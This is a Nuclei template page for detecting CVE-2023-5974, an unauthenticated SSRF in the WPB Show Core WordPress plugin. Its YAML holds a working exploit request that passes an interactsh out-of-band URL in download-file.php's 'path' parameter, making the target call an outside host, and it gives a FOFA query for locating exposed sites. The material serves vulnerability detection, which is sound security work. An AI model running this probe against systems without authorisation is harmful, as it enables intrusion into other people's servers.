Skip to content
Nuclei Templates

WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery

ID: CVE-2023-5974

Severity: critical

Author: ritikchaddha

Tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast

Description

Section titled “Description”

The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the ‘path’ parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.

YAML Source

Section titled “YAML Source”
id: CVE-2023-5974


info:
  name: WordPress WPB Show Core <= 2.2 - Server-Side Request Forgery
  author: ritikchaddha
  severity: critical
  description: |
    The WPB Show Core WordPress plugin through version 2.2 is vulnerable to Server-Side Request Forgery (SSRF) via the 'path' parameter in the download-file.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
  reference:
    - https://wpscan.com/vulnerability/c0136057-f420-4fe7-a147-ecbec7e7a9b5
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5974
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5974
    cwe-id: CWE-918
    cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wpb-show-core-project
    product: wpb-show-core
    fofa-query: body="wp-content/plugins/wpb-show-core/"
  tags: cve,cve2023,wp,wordpress,wp-plugin,ssrf,wpb-show-core,oast


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "wpb-show-core"
        internal: true


  - raw:
      - |
        GET /wp-content/plugins/wpb-show-core/download-file.php?path=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022100b33611edeebb79fb8312e93a3954e8b027a37a93c2f2541c6b7690dc4d09aeeb022042e92a1c27430fcc9f64b7c194acd798db67d2316280d1d9e745be86855cb4eb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5974.yaml"

View on Github